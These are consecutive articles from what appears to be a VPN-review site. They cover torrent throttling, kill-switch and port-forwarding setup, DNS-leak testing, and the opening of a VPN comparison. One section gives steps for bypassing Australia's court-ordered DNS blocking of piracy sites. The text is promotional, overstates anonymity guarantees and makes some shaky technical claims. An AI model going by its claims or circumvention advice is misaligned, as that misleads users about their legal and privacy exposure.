One such technique is called traffic shaping. The flow of certain packets is delayed in favour of others, affecting download and upload speed. This can be done as a blanket, or through intelligent burst shaping. Burst shaping increases torrent speeds for a short period, before gradually returning to a lesser speed. Thus, extended downloads such as movies, games, and streaming are slower, while web pages still load quickly.

The need for shaping comes from the limited bandwidth resources of an ISP. It lets the service provider guarantee performance to other users by reducing the effect of heavy users. Often, P2P is main target for this, and it’s easy to see why. Torrent downloads use large amounts of bandwidth and therefore cost a lot of money to sustain. In addition, companies are under a lot of legal pressure from copyright holders. By throttling, they can assure the parties that they’re doing their bit to limit the impact of pirates.

Unfortunately, it’s difficult to differentiate between legal P2P downloads and illegal ones. This means that regular users can be throttled due to blanket policies. You can check if your torrents are being throttled by running the Glasnost test (no longer developed). The eight-minute download will detect bandwidth throttling in the upload and download streams separately.

We tried the Glasnost test which failed to confirm our suspicions of BitTorrent bandwidth throttling:

Glasnost failed to detect any BitTorrent Bandwidth Throttling for our connection 

Glasnost failed to detect any BitTorrent Bandwidth Throttling for our connection

There are many cases where the Glasnost test will not accurately detect BitTorrent bandwidth throttling which is where personal experience confirms these suspicions.

BitTorrent without a VPN provided a Max Download Speed of 1.2Mbps 

BitTorrent without a VPN provided a Max Download Speed of 1.2Mbps

If you find an issue with your broadband provider, there are still steps you can take avoid throttling. Using a VPN for torrenting will ensure your ISP can’t categorize that data. If they don’t know it’s happening, they probably won’t throttle it, which will result in faster speeds.

How a VPN Can Increase Torrent Speeds – Real Example Avoiding BitTorrent Bandwidth Throttling

VPN speed increases are often quite significant. The exact difference depends on your ISP, but it can increase torrent speeds by double or triple. This is despite latency caused by encryption methods and cross-continent connections.

In our tests, we found an increase in BitTorrent download speed from a pitty 1.3 Mbps max to a whopping 3.1 Mbps max using our StrongVPN connection. This test was carried out on a completely legal download of CentOS, showing that ISPs don’t make exceptions. This reduced the ETA of the download significantly, bringing it to an acceptable time.

 VPN for Torrenting increases download speed

BitTorrent traffic over VPN with StrongVPN increased out download speeds by almost 3 times

It’s worth noting that using a VPN for torrenting doesn’t necessarily mean you’ll get the full speed of your internet connection. The speed upon which you can download is dependent on many factors including the plan you have with your ISP, how busy your local ISPs exchange is, VPN provider & VPN server you’ve connected to, their (VPN servers) max upload bandwidth, type of encryption selected for the VPN and many more.

For example, torrenting on stronger, 256-AES encryption, results in a slower connection than 128-AES encryption. The latter also provides less protection (weaker encryption), so the best fit depends on your usage scenario. The type of data authentication also makes a difference. Data protection prevents so-called active attacks, where the attacker gets between you and the VPN server and inject or modify data. SHA1 is the fastest method, but SHA256 is also common. It’s worth checking what options there are before you buy a VPN for torrenting.

Ensuring Your VPN for Torrenting is Protecting You

Despite these protection methods, you still may not be safe torrenting on certain VPNs. Some providers have strict policies on P2P downloads, often due to their legal situation of location. Many do not officially support illegal activity and if your provider keeps logs, they may be forced to hand them over to authorities or copyright holders.

A free VPN for torrenting is especially risky. Fighting copyright holders takes a lot of time and resources, and most companies will only protect paying customers. They can also come with data caps or sell your details, so it’s usually worth paying a small monthly fee for true anonymous torrenting.

Paid services have a vested interest in keeping consumers safe from copyright holders. As a business, their reputation depends on delivering what is advertised and keeping users safe. It’s always worth checking the provider’s policies before signing up.

However, there are also issues that can stem from the individual user, rather than the VPN provider. Your IP address may be revealed through a DNS Leak or other means. This is easy to check and can be done straight from your browser.

One of the most popular online tools ipMagnet. First, you will want to visit the site with your VPN. Loading the web page should display the IP address assigned by your VPN provider, not the IP address assigned by your ISP. Once this has been verified, you’ll want to hit the blue Magnet link text shown below:

 ipmagnet

ipMagnet allows BitTorrent users verify they are not exposing their real IP address

You will then be prompted to add the file to the BitTorrent application of your choice. The link points to a fake file, and the embedded tracker is controlled by qMagnet who archives the information and returns it to you. The download is completely legal and the files shouldn’t take up any space on your hard drive. Moreover, the source code of ipMagnet is freely available online. It’s best to let this run for a while until multiple lines show in the table:

 ipMagnet in Action reveals our VPN Service Provider is not exposing our real IP address

ipMagnet in Action reveals our VPN Service Provider is not exposing our real IP address

You can also use see the IP address under the trackers section of your BitTorrent client. The message field should only display the IP address shows in your VPN client and will be updated if anything changes. If any of them display your real IP address (assigned by your ISP) you have a problem. This means that your real IP address is leaking and is viewable to your peers and snoopers.

The best way to avoid such leaks is through a Kill Switch. This feature is often found within reliable VPN service providers or BitTorrent clients and shuts off your connection if the VPN for torrenting drops out. With reliable providers, this doesn’t happen often, but a few seconds is all it takes to expose your identity.

Set Up a VPN Kill Switch in qBittorrent

Some torrent clients have Kill Switch functionality built-in. This is true for popular providers such as qBitorrent, Vuze, and uTorrent and can help enforce anonymous torrenting. You can follow this guide to enable it for qBittorrent in Windows 10:

  1. Hit the Windows key and type Network and Sharing Center. Press Enter.
  2. Click Change adapter settings in the left side panel.
  3. In the Network Connections window, identify the adapter your VPN uses. For us, it was an Ethernet TAP-Windows Adapter you can see as Firewall VPN:

    qBittorrent setup network
  4. Open qBittorrent on your system.
  5. Select Tools > Options. Click the Advanced tab.
  6. In the Setting column, look for Network Interface.
  7. Set the drop down menu tothe previously identified adapter (Firewall VPN).
  8. Click OK.
  9. Restart qBittorrent.

Note that you need to fully quit qBittorent for this to work. That means right-clicking on the icon in the system tray and clicking exit. On start, you should notice that your download speed won’t budge from zero unless you enable your VPN. As soon as you start it up again, you’ll see an increased torrent speed.

Set Up a VPN Killswitch With Comodo Firewall

If neither your VPN or torrent client works with a Kill Switch, you’ll have to look elsewhere. Comodo Firewall is a good, tried and tested alternative. The setup is more complex, but ensures stable privacy and less fiddling later. First, you need to find the VPNs physical address. To start, type cmd in the start menu and run it as an administrator.

Then type ipconfig /all and look for the adapter that says TAP -Windows Adapter next to the description field. Note down the Physical Address, and start Comodo Firewall:

comodo firewall MAC address

You’ll then want to set up a new network zone. Go to Settings > Firewall > Network Zones and select Add > New Network Zone. Name it VPN for Torrenting and press okay.

Comodo Network Zone Setup for Torrenting

Your new zone should now show up in Comodo. Select it and click Add > New Address. Change the type to Mac Address and input the physical address from earlier:

comodo firewall 3

Now you’ll want to create some rulesets. Go to Firewall > Rulesets and hit Add. Name it Kill Switch Ruleset. You can then add three separate rulesets with the following settings:

  • Action: Block
  • Protocol: IP
  • Direction: In or Out
  • Source Address: Any Address
  • Destination Address: Any Address
  • Action: Allow
  • Protocol: IP
  • Direction: Out
  • Source Address: Network Zone/VPN for Torrenting
  • Destination Address: Any Address
  • Action: Allow
  • Protocol: IP
  • Direction: In
  • Source Address: Any Address
  • Destination Address: Network Zone/VPN for Torrenting

Comodo Firewall Ruleset for Torrent Kill Switch

Hit OK and you’re almost done. In the Application Rules section of Advanced Settings, you can add any application you want the Kill Switch Ruleset to apply to. In this case, we want to add our torrent client. Browse to the location of the program and add it to the rule. Finally, check Use Ruleset and select Kill Switch Ruleset.

By using one or all the methods, you will ensure your VPN doesn’t leak your identity when it goes down. To be certain, run another test on ipMagnet with your VPN enabled and disabled. No IPs should appear when you aren’t connected.

VPN Port Forwarding & NAT Firewalls

Unfortunately, some users will still have problems downloading torrents with a VPN enabled. This is usually due to the use of VPN NAT firewalls. VPN usage degrades the protection of the NAT firewall built into your router. The functionality blocks incoming traffic unless it’s in response to a request you made. However, the encrypted nature of VPN tunneling means you lose that protection.

As a result, most VPN providers set up their own NAT firewalls that sit between their servers and the internet. This feature is usually presented as an optional toggle and offers much of the same protection. It can also result in issues when you’re using a VPN for torrenting.

NAT firewalls can make your connection slower, offsetting much of the anti-throttling advantages. To avoid this, you’ll have to set up a port in the firewall that lets P2P traffic through. This is generally called VPN port forwarding.

Some VPN port forwarding can be reached from the settings menu. A simple toggle is usually enough to solve any issues, but naturally, this can reduce security slightly.

VPN Port Forwarding in Private Internet Access VPN Client for Fast Torrent Downloads

VPN Port Forwarding in Private Internet Access

To get maximum efficiency, you will want port forward via the torrent client too. qBittorrent and other clients enable NAT-PNP and UPnP by default, which automates the process. In other scenarios, you may have to manually input the port in your torrent client. The five-digit port number usually displays on connection or inside the VPN window.

If your provider doesn’t provide you with a VPN port forwarding number or settings toggle, it’s worth contacting directly via email. Sometimes the ports will be provided on request rather than to everyone. In other cases the provider port forwards by default, but doesn’t inform the user.

Summary

All the aforementioned methods will help keep your identity and wallet protected. In the case of Torrent throttling, you will be one step closer to getting the connection speeds you pay for. Moreover, careful application will make it impossible for anyone to verify your identity and hand out hefty fines.

Despite this, using a VPN for torrenting doesn’t mean you’re completely immune. Some ISPs will throttle all encrypted traffic, or target individual users who use a lot of bandwidth. The failure of Kill Switches can also give you away, though they happen very rarely. Port forwarding can cause issues on occasion, making you more vulnerable to other kinds of attacks.

Finally, the precautions are next to useless if you don’t choose a trusted and logless VPN provider in the first place. As the market grows it's becoming increasingly important to find the Best VPN Service Provider for you through reliable VPN service reviews. If you use P2P file sharing, that’s a company who supports those methods and won’t hand over your IP to third parties.

  • Hits: 24941

How Australians Are Bypassing ISP Blocking of ThePirateBay, Torrentz, TorrentHound, IsoHunt and Streaming Service Sites

How to bypass ISP blocking in Australia - Access Torrent sitesIt was just a matter of time until the new global wave of government site blocking at the ISP level arrived in Australia. In mid-December 2016, the Federal Court ruled that Internet companies would need to block sites such as ThePirateBay, Torrentz, TorrentHound, IsoHunt and streaming service SolarMovie. Australian ISPs were given 15 days to comply with the new decision and implement different blocking mechanisms to make it more difficult for users to gain access to these sites, however, it seems like blockages were bypassed by Australian users in just a few seconds.

The deadlines for the ISPs to implement the blocking was the 31st of December so from the 1st of January 2017, access to the above mentioned sites would be denied.

Download Torrents and access restricted content safely from anywhere in the world!

Accessing ThePirateBay and other Blocked Sites from Australia

Currently, when an Australian online user tries to access any of the 5 sites they are presented with the following website:

ThePiratebay blocked by a large Australian ISP

The Piratebay blocked by a large Australian ISP

Australia’s mobile network providers are also blocking access to the above sites presenting their users with a similar website.

No matter which ISP or mobile network users are coming from, they now all receive a message stating access to the selected sites is disabled.

How ISPs are Blocking ThePirateBay, Torrentz, TorrentHound, IsoHunt & SolarMovie

There is a number of different ways an ISP can choose to block access to the above sites in order to comply with the Federal Court ruling. This includes blocking IP addresses, DNS blocking, URL blocking or any other method agreed mutually by the ISPs and rights holders.

At the moment Telstra, Optus and DoDo, which are amongst Australia’s largest ISPs for home, businesses and mobile users, are implementing DNS blocking. When users on their networks send a DNS request to their DNS servers they are redirected to one of the sites specifically setup for the block.

The ISP block is affecting all of Australia’s mobile users

Optus DNS Blocking redirects users to a different website when trying to access ThePiratebay.org

This is also clearly evident when performing a simple nslookup query. In the example below, we queried Optus’s DNS server for www.thepiratebay.org and saw it pointed us to IP addresses 13.54.13.201 & 54.79.39.115 which do not belong to ThePirateBay:

Nslookup shows how easy it is to bypass DNS blocking and access any DNS-blocked site

Nslookup shows how easy it is to bypass DNS blocking and access any DNS-blocked site

After switching to Google’s public DNS servers located in the US, you’ll notice that we received different IP addresses for www.thepiratebay.org and were able to successfully access the website along with all other blocked websites.

Bypass DNS Blocking in Australia with a VPN Service

Using a VPN Service Provider is the best, safest and fastest way to access any restricted site not only from Australia but also across the globe. When connecting to a VPN service your internet traffic is routed through the VPN server, bypassing any local geographical restrictions, blocking or checkpoints from your ISP or government.

The advantages inherent in a VPN service are many but here are some of the most important:

  • Protection against DNS Leaking
  • Accessing blocked sites without exposing your internet activity
  • Torrenting without any restrictions
  • Stopping Bandwidth throttling from your ISP – take full advantage of your internet connection
  • Accessing region-restricted websites
  • Protecting your online privacy and identity
  • The ability to run the VPN client on your workstation/laptop or any mobile device
  • Unlimited access to US Netflix and other streaming services
  • Military-grade encryption to ensure your traffic is secure from hackers and monitoring services
  • The ability to share the VPN with multiple devices, including SmartTV, Netflix, family members and more

Perhaps the most challenging part when it comes to a VPN service is finding the Best VPN Service that is capable of delivering fast download or upload speeds, security, portability, Unblock Netflix and strong encryption. Our Best VPN Service review is a comprehensive review that provides a unique, truthful, in-depth look at 6 Top VPN service providers to help you make the best choice.

 best vpn service comparison
The Best VPN Service Providers

Mobile users can greatly benefit from a VPN service as they can safely access torrent or streaming sites while travelling, commuting on the train/tram/bus without worrying about being blocked or tracked by their ISP.

Providers such as StrongVPN have a single-button function to activate the VPN service and unlock everything while keeping you safe. For example, when we tried accessing thepiratebay.org from our mobile phone we received the following:

 Accessing thepiratebay.org from a mobile within Australia without a VPN service

Accessing thepiratebay.org from a mobile within Australia without a VPN service

We then turned to our ExpressVPN client (covered in our review) and with the click of a single button (power button in the middle) we were able to automatically connect to a nearby VPN server in Melbourne, which means great speeds, stability, and access to thepiratebay.org without a problem through our heavily encrypted VPN session:

Accessing thepiratebay.org from a mobile within Australia with a VPN ServiceAccessing thepiratebay.org from a mobile within Australia after connecting to ExpressVPN Service (click to enlarge)

Another great feature with VPN service providers is that all have servers present in Australia which translates to superfast access without any delays. VPN servers do not use any local Australian ISP DNS servers which means they are immune to DNS blocking implemented by ISPs.

It’s never been easier or faster to safely access and surf the internet! Our Best VPN Service review provides all necessary information to help you select the right VPN provider and never worry again about ISP blocking.

Readers can also refer to our VPN Guide for Beginners which explains how VPNs work and analyzes the security services a VPN provider must support.

Bypass DNS Blocking in Australia by Changing Your Computer’s DNS Server

DNS Blocking is perhaps the easiest to circumvent and, luckily, this seems to also be the preferred method used by all major ISPs in Australia to enforce the recent Federal Court decision.

Note: While changing the DNS server is relatively easy to get access to blocked sites, you should be aware that your ISP is still capable of monitoring your activities when visiting these sites and downloading or streaming content. Only a VPN service is capable of protecting your identity and hiding your online activity from your ISP and government agencies.

To bypass your ISP’s DNS Blocking simply change your DNS servers so that you are using DNS servers located outside of Australia or DNS servers not owned by any of the Australian ISPs.

Changing your DNS server setting might be easy for desktop PCs and laptops however it can prove to be more challenging for mobile users who are accessing the internet via their mobile network provider. For mobile users, we highly recommend a VPN service instead as it provides peace of mind - and you can activate or deactivate the VPN at the click of a button!

Bypass DNS Blocking on Windows Systems

To bypass DNS blocking on Windows systems all that’s required is to change the DNS servers used by the operating system.

Note: Windows 10 users should read our DNS Leak Testing and Prevention article to ensure they properly configure their system to avoid leaking DNS requests. VPN users won’t need to worry about this as most VPN clients have DNS Leak Protection built-into their client. All VPN providers reviewed provide DNS Leak Protection.

To change your DNS server settings, simply navigate to Control Panel>Network and Sharing Centre and left-click on your network adapter connection (usually wireless). In our example this is a WiFi connection with SSID Firewall:

Accessing your wireless or wired network adapter network settings

Accessing your wireless or wired network adapter network settings

In the window that opens click on Properties (Step 1). This will open the adapter’s network properties. Now double-click on Internet Protocol Version 4 (Step 2) to open the IPv4 Properties window:

Configuring custom DNS servers to bypass DNS blocking

Configuring custom DNS servers to bypass DNS blocking (click to enlarge)

Select Use the following DNS server addresses (Step 3) and insert two DNS servers of your choice e.g 8.8.8.8 for the Preferred DNS server and 8.8.4.4 for the Alternative DNS server. Finally click on OK/Close (Steps 4-6) to close all windows and save the new settings.

You might also need to flush your DNS cache in case you’ve already attempted to access any of the blocked sites. This can easily be done by opening a command prompt and typing ipconfig /flushdns. Alternatively simply restart your computer.

Bypass DNS Blocking On MAC OS & Ubuntu Linux

MacOS and Linux users can also make changes to their systems to avoid the DNS Blocking. Below is a quick guide for each operating system. Steps might be slightly different depending on the O/S version:

MacOS

  • Go to System Preferences
  • Click Network
  • Select your WiFi or ethernet connection
  • Hit Advanced…
  • Click
  • Enter your DNS details and press Okay

Ubuntu

  • Navigate to System Settings, then to Network
  • Select your connection
  • Hit Options…
  • Go to the IPv4 Settings tab
  • Enter your DNS Servers
  • Click Save

Bypass DNS Blocking In Australia via Router DHCP Change

Home users usually obtain their network settings automatically when connecting to their home network. By default, the router is configured with a DHCP server that is responsible for handing out IP addresses to all network clients so they can access the internet.

One of the parameters handed out by the DHCP server is the DNS server settings which are usually set to the IP address of the router or the ISP’s DNS servers. All that’s required here is to configure these values to match either Google’s DNS servers (8.8.8.8 & 8.8.4.4) or any other public DNS servers.

Below is an example of a Linksys router showing the DNS parameters under the DHCP server settings:

Bypass the Australian DNS Block by changing your router’s DHCP server DNS parameters

Bypass the Australian DNS Block by changing your router’s DHCP server DNS parameters (click to enlarge)

Changing the DNS parameters should be fairly easy assuming you can access them.

Some routers such as the Netgear CG3000, used mainly by Optus Australia, offers DHCP services to automatically configure clients connecting to the local network, however, it does not allow users to change the DNS parameters of the DHCP server. Users with this router or other routers with similar restrictions will have to manually change the DNS server settings on their computers.

Summary

Australia might have been hit by its first DNS Block from ThePirateBay, Torrentz, TorrentHound, IsoHunt and streaming service SolarMovie site, however, circumventing the block has proven a very easy case thanks to VPN Service Providers and other technical tricks. One thing is certain – this is just the beginning of a very long battle against privacy and censorship and it’s certainly going to get more difficult and messy as time passes and copyright holders continue to demand stricter measures and possibly penalties for Australian internet users.

Recent events show that this is the right time to start thinking about your online privacy and ensure no one is able to monitor your online activities. Do yourself a favour and visit our Best VPN Service Providers list to see how a VPN can unlock the internet, bypassing every restriction, while at the same time protect your privacy no matter where you are in the world and what device you’re connecting from.

  • Hits: 47190

DNS Leak Testing & Protection – How to Avoid Exposing Your Identity & Online Activity

DNS Leak - ISPs & Government spying on users online activitiesDespite innovations in security and technology, it’s difficult to remain anonymous online. Identifying information is seemingly everywhere – from malicious JavaScript tracking to the location services in web browsers. Even secure Linux operating systems like Tails have struggled to protect user’s privacy.

Windows 10 is no safe haven, either. By default, Microsoft collects information from users on an unprecedented level. Data that can be turned over to authorities or a third party. Increasingly, users must take extra steps to ensure privacy and be more knowledgeable about the services they’re using.

This applies even to users with anonymizing software. Virtual Private Networks (VPNs) are sometimes seen as blanket tools that guarantee identity protection. In truth, they have their own vulnerabilities and chief among them is the DNS Leak which only the best VPN service providers are able to resolve.

StrongVPN is our recommended VPN solution offering superior protection using a fast network of servers across the globe!

Understanding VPN DNS Leaks & How They Work

When you type a website URL into your browser, you’re essentially using a nickname. Typing in “firewall.cx” is more like asking a question. You send a request to a Domain Name System server, which then points you to the IP address of the site (208.86.155.203). This saves us typing long strings of numbers each time, and is better for pretty much everyone.

However, it also comes with its own problem. DNS servers are given by your internet service provider (ISP), which offers them a list of every website you visit. Naturally, this compromises anonymity, but VPNs are supposed to fix that. Instead of requesting from your ISP, your traffic is routed through the VPN, protecting you.

Unfortunately, it doesn’t always work. In some cases, the operating system uses its default DNS servers instead of switching things up. This is most common in Windows, but can also happen on OSX, Linux, and mobile devices. It’s aptly named a DNS leak.

In some cases, a VPN is worse than not using one at all. Why? When using anonymising software, users have a sense of security. They may perform activities they wouldn’t otherwise, such as torrenting software or visiting controversial websites. It’s not immediately clear that a leak has occurred, and the user goes on thinking they’re safe for months at a time. In reality, their IP address is open and visible.

DNS leaks aren’t just utilized by service providers either. Websites can discover your true IP address using WebRTC, a collection of communications protocols present in most browsers. WebRTC allows for a request to a service provider’s Session Traversal Utilities for NAT (STUN) servers, listing both the local (internal) and public IP address (router WAN IP) of the user via JavaScript.

This can give a general location of the user and be used to track them across the site or other sites by the same owner. In addition, law enforcement or hackers may be able to gain access to this data, leading to serious repercussions.

DNS Leaks Used By Govenrments and ISPs

For example, DNS leaks were utilized by the Canadian Government in 2015, helping to track users on popular file sharing websites. Revealed by Edward Snowden, the technique combines several tactics to find out the identity of downloaders. In this case, targeted files were primarily terrorism related, but this could easily be extended to other media.

Snowden Digital Surveillance Archive: Screenshot from Canada's Levitation Program

Snowden Digital Surveillance Archive: Screenshot from Canada's Levitation Program

In fact, the UK government recently passed a law that does just that. The Investigatory Powers Bill forces ISPs to store and hand over DNS records in bulk for almost every user. This is used to create a list of websites each person has visited, regardless of any wrongdoing. As a result, UK users should be especially cautious about VPN DNS leaks, and can be certain any slip ups will be recorded.

Another danger is your ISP sending a copyright warning from downloaded files. This is particularly relevant on student connections, where internet activity is more closely monitored. In some cases, it can result in a ban from the service. Your details can also be passed on to the copyright holder, who can then choose to pursue legal action.

In the student case, the user can have all of the correct settings enabled but still get a notice. It’s likely that the VPN cut out momentarily and began sending DNS requests to the wrong place. This allows the DNS to leak even if the anti-DNS leak setting is enabled.

VPN DNS leaks also occur regardless of location. Whether you’re using a VPN to protect yourself on WiFi hotspots, at work, or in your own home, the risk is still there. In fact, public networks may prove a bigger risk. It always pays to be extra cautious outside your home.

VPN DNS Leak Test – Best Sites for Testing Your DNS

Thankfully, there are very simple ways to tell if you have a VPN DNS leak. The most popular tool is an online service: DNS leak test.

First, you run your VPN client and connect from a different country. Clicking Extended Test will then return a list of IP addresses, their service provider, and country of origin. If any of these match your true location, you have a problem.

The DNS leak test sends your client several different domain names, simulating a connection to each one. It then tracks the requests sent to its own DNS servers and other servers that the request bounces around before being resolved. The results are returned in your browser.

The standard test is good enough for most people, completing one round of six queries. However, to be completely sure, you should use the extended test. A total of 36 queries should be enough to discover all DNS servers. However, an extended test can take up to thirty seconds longer, so standard is good enough if you aren’t doing anything too sensitive.

VPN DNS leak testing is essential when you move to any new VPN client, but it’s good to test on occasion regardless. Changes in your operating system, browser settings, or an update to the VPN can all revert to incorrect servers.

VPN DNS Leak Protection is one of the many essential security features a VPN must have. We should note that all VPN clients tested in our Best VPN Service article provide DNS Leak Protection and passed all DNS Leak tests.

VPN DNS Leak Protection

Thankfully, if you do find a leak it's not the end of the world. There are plenty of ways to protect yourself from DNS leaks, and most of them are simple. One of the best methods is force your operating system to use VPN DNS servers instead of your ISP’s. Most services will be happy to provide these, but otherwise you can use a public DNS like Google, OpenDNS or Comodo Secure.

However, those looking for privacy will want to avoid companies looking to profit. Google has been known to use the data to target advertising. DNS providers like OpenNIC give a non-profit, open and uncensored service free of charge. Once you’ve found your preferred host, it’s not difficult to configure on any OS.

Windows 10 DNS Leak Protection & Prevention

In Windows 10, simply navigate to Control Panel>Network and Sharing Centre and left-click on your network adapter connection (usually wireless). In our example this is a WiFi connection with SSID Firewall:

 Accessing your Windows 10 wireless or wired network adapter settings

Accessing your Windows 10 wireless or wired network adapter settings

On the next window click on Properties (1). This will open the adapter’s network properties. Now double-click on Internet Protocol Version 4 (2) to open the IPv4 Properties window:

Configuring custom open DNS servers to protect against DNS LeaksConfiguring Windows 10 custom open DNS servers to protect against DNS Leaks (click to enlarge)

Select Use the following DNS server addresses and insert two DNS servers of your choice from OpenNic (3). Finally click on OK/Close (4-6) to close all windows and save the new settings.

If that’s too many steps, you can use a tool like DNS Jumper. You can quickly jump between different DNS servers or set your own custom ones. Furthermore, it requires no install and will test a long list of providers to find the fastest connection. This is particularly useful if you play online games, as it will avoid high ping.

MAC OS & Ubuntu Linux DNS Leak Protection

Though Mac and Linux tend to suffer from fewer issues, you may still want to set things up to be on the safe side. It’s almost the same, so we won’t go into too much detail. Here’s a quick guide:

MAC OS

  • Go to System Preferences
  • ClickNetwork
  • Select your WiFi or ethernet connection
  • Hit Advanced…
  • Click
  • Enter your DNS details and press Okay

Ubuntu Linux

  • Navigate to System Settings, then to Network
  • Select your connection
  • Hit Options…
  • Go to the IPv4 Settings tab
  • Enter your DNS Servers
  • Click Save

You can also configure settings on iOS, Android and even the router itself. This makes it easier to avoid the dangers of WiFi hotspots and can make all your devices safe. However, there are plenty of other ways to prevent VPN DNS leaks. These can often be used in combination with each other for maximum security.

Windows Teredo Can Lead to DNS Leaks

In Windows, a technology called Teredo that allows tunnelling IPv6 traffic through IPv4 packets using the UDP Protocol, can often lead to DNS leaks. Essentially it allows communication between the two major IP protocols, IPv4 and IPv6. Teredo is on by default in Windows 10, but you can turn it off with a single cmd command.

First you’ll need to open a Command Prompt window with administrator privileges. In the Search Windows box (next to the start button) type cmd, right click on Command Prompt and select Run as Administrator:

Opening a Windows Command Prompt with Administrator Privileges

Opening a Windows Command Prompt with Administrator Privileges

At the command prompt, type the following command: netsh interface teredo set state disabled:

Disabling Windows Teredo to help prevent DNS Leak

The system will return Ok indicating that teredo has been successfully disabled

In some cases you may need Teredo, but thankfully it’s just as easy to enable it again. This time, type: netsh interface teredo set state type=default.

How to Disable WebRTC in FireFox and Chrome

Unfortunately, the disabling Teredo doesn’t address issue of WebRTC in the browser. The procedure to disable it is different for each browser, and usually involves heading to the config page.

In Mozilla’s Firefox, you can type about:config in the URL bar. The line media.peerconnection.enabled will be shown lower down, and you can then double-click to toggle it off:

Disabling WebRTC in Mozilla FireFox

Disabling WebRTC in Mozilla FireFox

Bear in mind that disabling WebRTC may result in a small loss of functionality. The communications protocols allow for video conferencing, file transfer and more without the need for other plugins. However, there is a fall-back method for most tasks, meaning it's far from essential.

Unfortunately, there’s no way to disable WebRTC in Chrome by default. This is to be expected, as Google pioneered the method and wants people to use it. Thankfully, Google addressed concerns early this year by releasing a plugin (make sure you open the link with Chrome).

disabling webRTC in chrome

With WebRTC Network Limiter, you can display your Public IP address or you can route it through your proxy server (last option). The latter is recommended for maximum safety, but can cause issues with performance.

Use a VPN with DNS Leak Protection

Fortunately, it's not just users who are aware of the DNS leak issue. Most clients have VPN DNS leak prevention built in and don’t require any input from the customer. Our Best VPN Service Provider article includes the TOP 5 VPN Service Providers with VPN Clients that automatically provide VPN DNS Leak Protection.

In most cases, VPN providers will have their own private DNS servers. StrongVPN has a “Network Lock” option, where all traffic is forced through the VPN tunnel, including domain name requests. When you disconnect from a VPN temporarily, internet is cut out entirely, making sure no traffic leaves the tunnel. This is also known as a Kill Switch.

With PIA, DNS leak prevention is on by default. The client redirects requests to its own name servers (198.18.0.1) much like changing it manually through Windows. This makes it very unlikely that a leak will occur, and combines with a Kill Switch option similar to StrongVPN. PIA also lets you bring up a third-party DNS, so you can OpenNIC and other servers if you prefer. Both methods take a lot of work away from the user, and make it simple to prevent DNS leaks.

Summary

In all, built-in protection provides the most intuitive solution to DNS leaks. Finding a VPN that has a solution to this issue is becoming increasingly important, and without any measures there are serious risks to the privacy. It’s well worth shopping around to find a VPN Service that supports VPN DNS Leak Protection in an intelligent way.

Furthermore, VPNs that take DNS leaks seriously are more likely to take other privacy matters into consideration. A host that won’t take care of the most prevalent issue is less likely to address the smaller ones, or forgo logs.

That said, you shouldn’t blindly trust the provider’s word, either. Operating systems are complex, and it's not always possible for them to patch every hole. Sometimes problems can happen even with the protections in place. As such, DNS leak testing is essential. Taking your own measures will only increase privacy, and combining both will make this vulnerability almost non-existent.

  • Hits: 25348

Best VPN Service - Top VPN Service Reviews and VPN Comparisons

Best Fastest VPN Service ProviderVPN Services have become a necessity for users concerned about their online privacy and security. With literally hundreds of thousands of attacks daily, exploits and security vulnerabilities being discovered plus government agencies and ISPs monitoring user activity, the internet is no longer considered a safe place.

With the help of a VPN Service, users are able to hide their real IP address and online activities by connecting to a VPN server and passing all traffic through that server. This way, the internet only sees the IP address of the VPN server.

Today, extended VPN Services provide us with many different and useful capabilities. For example they can provide users with the ability to bypass geo-restrictions for streaming services such as Hulu and Netflix. They also offer increased security and identity protection for mobile devices such as iPhones, iPads, Laptops, Android smartphones, tablet devices etc. This makes finding and selecting the best VPN Service a difficult task as there are many parameters to take into consideration. Our dedicated network security team here at Firewall.cx has done just that for every VPN Provider and then put them to the test to produce the best VPN Service review ever.

Benefits of a VPN Service

Understanding the importance and benefits of a VPN is crucial to help you decide if you need a VPN and what features you should look for. Despite the different offerings from VPN providers there are some standard benefits that you’ll always get:

  • Increased Privacy. A VPN will hide your activities from your ISP and government. Traffic entering and exiting your VPN-enabled device is encrypted, making it almost impossible to intercept and decrypt.
  • Hiding your IP address. A VPN will hide your IP address as all traffic is tunnelled through the VPN provider. Addition security features such as DNS Leak Protection will ensure your IP addresses and online activity is not exposed.
  • Unblocking Geo-blocking services such as Netflix, Hulu and others. By connecting to a VPN server located in the country you wish to access content from, you’re able to by-pass any geo-blocking.
  • Increased Torrent Download Speed. Bandwidth throttling is big problem for home users as ISPs unofficially lower the priority of torrent data streams, resulting in slow download speeds. A VPN encrypts all traffic so the ISP is unable to determine what you’re downloading.
  • Bypass Firewall Restrictions. When connecting to a VPN server all application traffic, regardless of the ports used, is channelled through the VPN. This bypasses all restrictions enforced by a firewall or proxy server allowing you to use any application (torrent, chat, streaming, gaming, SMTP etc).

Best VPN Service Review: Quick Summary

best vpn service comparison
The Best VPN Service Providers. Scroll below for each provider's direct link.

How Our Best VPN Service Tests Were Performed

Evaluating the best VPN service can be a tricky task, especially when you take into consideration that not everyone is looking for the same features in a VPN. To give each provider a fair chance to live up to its reputation we decided to evaluate them based on the following criteria listed in order of importance:

  • SpeedTest.net Download/Upload including Latency test
  • Netflix VPN, Torrents and Blocked sites, Geo-blocking Bypass.
  • Security features (DNS Leak Protection, Kill Switch etc)
  • Encryption protocols (PPTP/L2TP IPSec/OpenVPN etc) & Support for Dedicated VPN Routers
  • No-Log Policy & Bitcoin payment support
  • User-Friendly VPN client interface
  • Price – based on a 12 month subscription

Testing US Netflix Best VPN Providers

Accessing & streaming US Netflix content is a hot topic for most of our readers which is why we’ve included it in our tests. While other reviews might indicate whether or not US Netflix is supported, we took that extra step to test and verify the service.

All Netflix stream testing was performed from a 20Mbps home broadband connection using a US Netflix account configured to stream at the highest possible setting (High) which generates 3GB/hour for HD or 7GB/hour for Ultra HD. These settings would test each VPN Provider’s ability to perform continuous, uninterrupted streaming to a home or mobile VPN user.

Best VPN Provider Download/Upload Speed Tests

Speedtest.net was selected as a testing platform to evaluate download and upload speeds. Our tests were performed from Melbourne Australia using a premium 200Mbps link to the internet while OpenVPN UDP or OpenVPN TCP (when UDP failed) was the VPN protocol used to connect to each provider. The Speedtest.net server located at San Jose, CA Server (No.4) shown below was used for download/upload test. This server was strategically selected as it’s hosted by Speedtest.net and showed stable transfer rates capable of exceeding 185Mbps.

Best VPN Service - Speed Test 

Our selected Speedtest.net server and non-VPN speed tests results (click to enlarge)

Our Speedtest.net test to San Jose, CA Server (No.4) without a VPN yielded an impressive 185Mbps download speed and 123Mbps upload speed confirming the path between us and the Speedtest.net server was not congested.

While test values still fluctuated, the tests we’ve selected to publish are the average results from each VPN Provider.

Best VPN Service Providers

Without further delay, let’s take an in-depth look at our Best VPN Service Providers:
